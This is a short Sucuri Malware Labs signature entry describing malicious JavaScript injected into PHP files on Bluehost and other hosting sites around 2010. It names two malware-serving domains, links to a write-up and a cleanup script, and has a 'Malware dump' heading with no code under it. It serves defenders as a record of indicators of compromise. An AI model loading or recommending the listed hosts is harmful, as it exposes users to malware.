Sucuri Malware Labs


Malware entry: MW:BLUEH:1

Description:

Code used to insert malicious JavaScript into sites hosted at Bluehost. The second wave of attacks affected a few more hosting companies. The injected code loads malware from:

http://domainameat.cc
http://ae.awaue.com

Details:

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploites-by-domainameat-cc.html


Clean up:

Run the following script: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html


Malware dump (base64 added to the .php files):


 



For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb